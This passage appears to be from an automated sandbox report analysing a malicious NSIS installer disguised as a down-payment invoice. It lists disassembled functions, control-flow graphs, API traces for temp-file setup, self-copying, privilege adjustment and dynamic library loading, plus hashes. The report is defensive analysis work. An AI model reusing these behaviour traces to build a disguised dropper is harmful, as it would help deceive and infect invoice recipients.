5224->5227 5226->5227 5228 6f1d160d wsprintfW 5226->5228 5227->5130 5228->5227 5230 6f1d253e 5229->5230 5232 6f1d1895 5229->5232 5231 6f1d255a GlobalFree 5230->5231 5230->5232 5231->5230 5232->5137 5232->5138 5234 6f1d1272 2 API calls 5233->5234 5235 6f1d155e 5234->5235 5235->5131 5236->5142 5237->5145 5239 6f1d15ad 5238->5239 5239->5165 5246 6f1d121b GlobalAlloc 5240->5246 5242 6f1d123b lstrcpynW 5242->5167 5243->5173 5244->5161 5245->5169 5246->5242 5248 6f1d12c1 5247->5248 5249 6f1d122c 2 API calls 5248->5249 5250 6f1d12df 5249->5250 5250->5176 5252 6f1d26ca VirtualAlloc 5251->5252 5253 6f1d2720 5251->5253 5252->5253 5253->5183 5254->5212 5256 6f1d130c 5255->5256 5257 6f1d12ea 5255->5257 5256->5212 5257->5256 5258 6f1d12f0 lstrcpyW 5257->5258 5258->5256 5259->5216 5989 402a35 5990 402c1f 17 API calls 5989->5990 5991 402a3b 5990->5991 5992 402a72 5991->5992 5993 40288b 5991->5993 5995 402a4d 5991->5995 5992->5993 5994 40640a 17 API calls 5992->5994 5994->5993 5995->5993 5997 40632f wsprintfW 5995->5997 5997->5993 5998 401735 5999 402c41 17 API calls 5998->5999 6000 40173c SearchPathW 5999->6000 6001 4029e6 6000->6001 6002 401757 6000->6002 6002->6001 6004 4063e8 lstrcpynW 6002->6004 6004->6001 6005 4014b8 6006 4014be 6005->6006 6007 401389 2 API calls 6006->6007 6008 4014c6 6007->6008 6009 401db9 GetDC 6010 402c1f 17 API calls 6009->6010 6011 401dcb GetDeviceCaps MulDiv ReleaseDC 6010->6011 6012 402c1f 17 API calls 6011->6012 6013 401dfc 6012->6013 6014 40640a 17 API calls 6013->6014 6015 401e39 CreateFontIndirectW 6014->6015 6016 402592 6015->6016 6017 40283b 6018 402843 6017->6018 6019 402847 FindNextFileW 6018->6019 6020 402859 6018->6020 6019->6020 6021 4029e6 6020->6021 6023 4063e8 lstrcpynW 6020->6023 6023->6021 6024 6f1d10e1 6033 6f1d1111 6024->6033 6025 6f1d11d8 GlobalFree 6026 6f1d12ba 2 API calls 6026->6033 6027 6f1d11d3 6027->6025 6028 6f1d1272 2 API calls 6032 6f1d11c4 GlobalFree 6028->6032 6029 6f1d1164 GlobalAlloc 6029->6033 6030 6f1d11f8 GlobalFree 6030->6033 6031 6f1d12e1 lstrcpyW 6031->6033 6032->6033 6033->6025 6033->6026 6033->6027 6033->6028 6033->6029 6033->6030 6033->6031 6033->6032

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 004034A5 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410stringfilecomCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 8 4034ee 1->8 3 4034fa-40350e call 406752 lstrlenA 2->3 9 403510-40352c call 4067c2 * 3 3->9 8->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 22 403536 17->22 22->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 31 4035d5-4035d9 28->31 32 4035ce-4035d3 28->32 36 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->36 37 403749-403763 DeleteFileW call 402f30 29->37 34 4035e0-4035e4 31->34 35 4035db-4035df 31->35 32->31 32->32 38 4036a3-4036b0 call 405cea 34->38 39 4035ea-4035f0 34->39 35->34 36->37 54 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 36->54 57 403814-403824 call 4039e6 OleUninitialize 37->57 58 403769-40376f 37->58 55 4036b2-4036b3 38->55 56 4036b4-4036ba 38->56 43 4035f2-4035fa 39->43 44 40360b-403644 39->44 50 403601 43->50 51 4035fc-4035ff 43->51 45 403661-40369b 44->45 46 403646-40364b 44->46 45->38 53 40369d-4036a1 45->53 46->45 52 40364d-403655 46->52 50->44 51->44 51->50 60 403657-40365a 52->60 61 40365c 52->61 53->38 62 4036c2-4036d0 call 4063e8 53->62 54->37 54->57 55->56 56->28 64 4036c0 56->64 74 40394a-403950 57->74 75 40382a-40383a call 405a4e ExitProcess 57->75 65 403804-40380b call 403ad8 58->65 66 403775-403780 call 405cea 58->66 60->45 60->61 61->45 69 4036d5 62->69 64->69 73 403810 65->73 77 403782-4037b7 66->77 78 4037ce-4037d8 66->78 69->29 73->57 80 403952-403968 GetCurrentProcess OpenProcessToken 74->80 81 4039ce-4039d6 74->81 82 4037b9-4037bd 77->82 85 403840-403854 call 4059b9 lstrcatW 78->85 86 4037da-4037e8 call 405dc5 78->86 88 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 80->88 89 40399e-4039ac call 4067c2 80->89 83 4039d8 81->83 84 4039dc-4039e0 ExitProcess 81->84 90 4037c6-4037ca 82->90 91 4037bf-4037c4 82->91 83->84 100 403861-40387b lstrcatW lstrcmpiW 85->100 101 403856-40385c lstrcatW 85->101 86->57 99 4037ea-403800 call 4063e8 * 2 86->99 88->89 102 4039ba-4039c5 ExitWindowsEx 89->102 103 4039ae-4039b8 89->103 90->82 95 4037cc 90->95 91->90 91->95 95->78 99->65 100->57 106 40387d-403880 100->106 101->100 102->81 104 4039c7-4039c9 call 40140b 102->104 103->102 103->104 104->81 110 403882-403887 call 40591f 106->110 111 403889 call 40599c 106->111 115 40388e-40389c SetCurrentDirectoryW 110->115 111->115 118 4038a9-4038d2 call 4063e8 115->118 119 40389e-4038a4 call 4063e8 115->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 128 40393e-403945 call 4061ae 126->128 127->126 129 403907-403927 call 4061ae call 40640a call 4059d1 127->129 128->57 129->126 138 403929-403930 CloseHandle 129->138 138->126
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                                                                                                                      • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00000020,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                                                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403705
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403721
                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040384D
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040385C
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403867
                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$.tmp$1033$C:\Users\user\AppData\Local\Admonishment64$C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                      • API String ID: 3441113951-738258447
                                                                                                                                                                                                                      • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                                                                                                                                      • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 153 40514f-405156 148->153 156 405080-405087 149->156 157 405073-40507a 149->157 154 404ed9 150->154 155 404edc-404ef9 call 40640a SendMessageW * 2 150->155 151->147 152 404f01-404f2d call 40435f * 2 151->152 195 404f33-404f39 152->195 196 404ff8-40500b GetWindowLongW SetWindowLongW 152->196 162 4051c7-4051cf 153->162 163 405158-40515e 153->163 154->155 155->151 159 405089-40508c 156->159 160 4050fc-4050ff 156->160 157->153 157->156 168 405097-4050ac call 404d1a 159->168 169 40508e-405095 159->169 160->153 164 405101-40510b 160->164 166 4051d1-4051d7 SendMessageW 162->166 167 4051d9-4051e0 162->167 171 405164-40516e 163->171 172 4053af-4053c1 call 4043c6 163->172 174 40511b-405125 164->174 175 40510d-405119 SendMessageW 164->175 166->167 176 4051e2-4051e9 167->176 177 405214-40521b 167->177 168->160 194 4050ae-4050bf 168->194 169->160 169->168 171->172 180 405174-405183 SendMessageW 171->180 174->153 182 405127-405131 174->182 175->174 183 4051f2-4051f9 176->183 184 4051eb-4051ec ImageList_Destroy 176->184 187 405371-405378 177->187 188 405221-40522d call 4011ef 177->188 180->172 189 405189-40519a SendMessageW 180->189 190 405142-40514c 182->190 191 405133-405140 182->191 192 405202-40520e 183->192 193 4051fb-4051fc GlobalFree 183->193 184->183 187->172 200 40537a-405381 187->200 213 40523d-405240 188->213 214 40522f-405232 188->214 198 4051a4-4051a6 189->198 199 40519c-4051a2 189->199 190->153 191->153 192->177 193->192 194->160 202 4050c1-4050c3 194->202 203 404f3c-404f43 195->203 201 405011-405015 196->201 205 4051a7-4051c0 call 401299 SendMessageW 198->205 199->198 199->205 200->172 206 405383-4053ad ShowWindow GetDlgItem ShowWindow 200->206 207 405017-40502a ShowWindow call 404394 201->207 208 40502f-405037 call 404394 201->208 209 4050c5-4050cc 202->209 210 4050d6 202->210 211 404fd9-404fec 203->211 212 404f49-404f71 203->212 205->162 206->172 207->172 208->140 221 4050d2-4050d4 209->221 222 4050ce-4050d0 209->222 225 4050d9-4050f5 call 40117d 210->225 211->203 216 404ff2-404ff6 211->216 223 404f73-404fa9 SendMessageW 212->223 224 404fab-404fad 212->224 217 405281-4052a5 call 4011ef 213->217 218 405242-40525b call 4012e2 call 401299 213->218 226 405234 214->226 227 405235-405238 call 404d9a 214->227 216->196 216->201 241 405347-40535b InvalidateRect 217->241 242 4052ab 217->242 246 40526b-40527a SendMessageW 218->246 247 40525d-405263 218->247 221->225 222->225 223->211 233 404fc0-404fd6 SendMessageW 224->233 234 404faf-404fbe SendMessageW 224->234 225->160 226->227 227->213 233->211 234->211 241->187 244 40535d-40536c call 404ced call 404cd5 241->244 245 4052ae-4052b9 242->245 244->187 248 4052bb-4052ca 245->248 249 40532f-405341 245->249 246->217 253 405265 247->253 254 405266-405269 247->254 251 4052cc-4052d9 248->251 252 4052dd-4052e0 248->252 249->241 249->245 251->252 256 4052e2-4052e5 252->256 257 4052e7-4052f0 252->257 253->254 254->246 254->247 259 4052f5-40532d SendMessageW * 2 256->259 257->259 260 4052f2 257->260 259->249 260->259
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                                                                                                      • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                                                                                                                                      • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 6F1D1B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6F1D121B: GlobalAlloc.KERNELBASE(00000040,?,6F1D123B,?,6F1D12DF,00000019,6F1D11BE,-000000A0), ref: 6F1D1225
                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F1D1C6F
                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 6F1D1CB7
                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 6F1D1CC1
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D1CD4
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F1D1DB6
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F1D1DBB
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F1D1DC0
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D1FAA
                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 6F1D2144
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 6F1D21B9
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 6F1D21CA
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 6F1D2224
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000808), ref: 6F1D223E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 245916457-0
                                                                                                                                                                                                                      • Opcode ID: 166e5d94269be122f6d6b6b4c2b55d08cd266cb7cbbd9b00409d0413915c4e4f
                                                                                                                                                                                                                      • Instruction ID: a6c8a9bcb251d474dc6caaefe2a837c78d66806936d043da4ecf21263864b09c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 166e5d94269be122f6d6b6b4c2b55d08cd266cb7cbbd9b00409d0413915c4e4f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D22DA71D04649DAEB10CFB8C9846EEB7B4FF16395F10462EF0A5F6280D774AAA1CB50
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405AFA Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 724 405afa-405b20 call 405dc5 727 405b22-405b34 DeleteFileW 724->727 728 405b39-405b40 724->728 729 405cb6-405cba 727->729 730 405b42-405b44 728->730 731 405b53-405b63 call 4063e8 728->731 733 405c64-405c69 730->733 734 405b4a-405b4d 730->734 737 405b72-405b73 call 405d09 731->737 738 405b65-405b70 lstrcatW 731->738 733->729 736 405c6b-405c6e 733->736 734->731 734->733 739 405c70-405c76 736->739 740 405c78-405c80 call 40672b 736->740 741 405b78-405b7c 737->741 738->741 739->729 740->729 748 405c82-405c96 call 405cbd call 405ab2 740->748 744 405b88-405b8e lstrcatW 741->744 745 405b7e-405b86 741->745 747 405b93-405baf lstrlenW FindFirstFileW 744->747 745->744 745->747 749 405bb5-405bbd 747->749 750 405c59-405c5d 747->750 764 405c98-405c9b 748->764 765 405cae-405cb1 call 405450 748->765 753 405bdd-405bf1 call 4063e8 749->753 754 405bbf-405bc7 749->754 750->733 752 405c5f 750->752 752->733 766 405bf3-405bfb 753->766 767 405c08-405c13 call 405ab2 753->767 756 405bc9-405bd1 754->756 757 405c3c-405c4c FindNextFileW 754->757 756->753 762 405bd3-405bdb 756->762 757->749 761 405c52-405c53 FindClose 757->761 761->750 762->753 762->757 764->739 768 405c9d-405cac call 405450 call 4061ae 764->768 765->729 766->757 769 405bfd-405c06 call 405afa 766->769 777 405c34-405c37 call 405450 767->777 778 405c15-405c18 767->778 768->729 769->757 777->757 781 405c1a-405c2a call 405450 call 4061ae 778->781 782 405c2c-405c32 778->782 781->757 782->757
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405B23
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00425730,\*.*), ref: 00405B6B
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405B8E
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405B94
                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405BA4
